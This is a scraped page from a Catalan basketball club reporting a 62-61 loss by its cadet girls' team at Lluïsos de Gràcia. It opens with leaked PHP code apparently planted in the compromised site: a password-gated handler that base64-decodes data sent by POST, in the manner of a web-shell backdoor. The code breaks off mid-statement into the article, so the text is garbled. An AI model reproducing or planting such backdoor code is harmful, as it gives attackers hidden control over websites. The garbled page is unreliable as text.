function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El cadet femení 04 A no pot amb la fe de la victòria del Lluïsos de Gràcia (62-61) - Tgn Bàsquet Club -

El cadet femení 04 A no pot amb la fe de la victòria del Lluïsos de Gràcia (62-61)

Updated: febrer 12, 2019

El cadet femení 04 A no va poder vèncer un partit molt igualat a la pista del Lluïsos de Gràcia, un rival molt competitiu. Després d’un inici una mica fluix, les noies que entrena Albert del Rey van patir la intensa defensa local però, tot i així, van acabar el primer quart per endavant (13-20). En el segon període, el resultat encara es va igualar més perquè les tarragonines tenien algunes jugadores amb faltes.

El panorama va empitjorar després del descans. Les locals van fer un parcial de 12-0 que deixava el marcador en 52-46 a falta de deu minuts pel final. El TGN Bàsquet va reaccionar després d’un temps mort i va fer un parcial de 0-14 que semblava que atorgaria el triomf a les liles, però no. El Lluïsos de Gràcia va creure fermament en la victòria i no es va donar per vençut. Dues errades defensives visitants en els últims instants van consumar la derrota.